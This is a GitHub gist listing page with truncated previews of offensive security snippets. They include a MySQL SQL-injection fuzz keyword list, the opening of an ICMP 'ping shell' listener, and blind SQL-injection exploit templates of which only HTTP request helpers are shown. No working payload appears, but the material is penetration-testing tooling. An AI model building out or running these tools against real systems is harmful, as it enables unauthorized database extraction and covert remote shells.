Skip to content

Instantly share code, notes, and snippets.

View waderwu's full-sized avatar
🎯
Focusing

yxxx waderwu

🎯
Focusing
View GitHub Profile
@waderwu
waderwu / common
Last active March 14, 2019 02:32
mysql slq inject fuzz list
Select
Union
Join
Order
By
Limit
From
Information
Schema
Table
@waderwu
waderwu / pingshell.py
Created May 9, 2020 09:05
ping icmp shell
#!/usr/bin/env python3
import socket
def listen():
s = socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_ICMP)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
res = b""
while 1:
data, addr = s.recvfrom(1508)
@waderwu
waderwu / sqli_exp_bit_and.py
Last active May 12, 2020 15:21
sql injection blind by bit and
#!/usr/bin/env python3
import requests
client = requests.Session()
debug = False
def get(url, data, headers=None):
if not headers:
headers = {}
headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'
@waderwu
waderwu / sqli_exp_binary_search.py
Last active May 23, 2020 16:11
sqli_exp_binary_search
#!/usr/bin/env python3
import requests
client = requests.Session()
debug = False
def get(url, data, headers=None):
if not headers:
headers = {}
@waderwu
waderwu / sqli_exp_binary_search_string.py
Created May 23, 2020 15:58
sqli blind binary search template
#!/usr/bin/env python3
import requests
client = requests.Session()
debug = False
def post(url, data, headers=None, proxy=False):
if not headers:
headers = {}
headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'
@waderwu
waderwu / 9test.php
Created June 4, 2020 03:06
fuzz php function parameters
class A{
private $client;
private $info = [
'url' => '',
'content_type' => '',
'http_code' => 0,
'header_size' => 0,
'request_size' => 0,
'filetime' => -1,
@waderwu
waderwu / http.py
Created June 5, 2020 02:33
python requests snippet
#!/usr/bin/env python3
import requests
client = requests
client = requests.Session()
debug = True
def get(url, data, headers=None):
if not headers:
headers = {}
headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'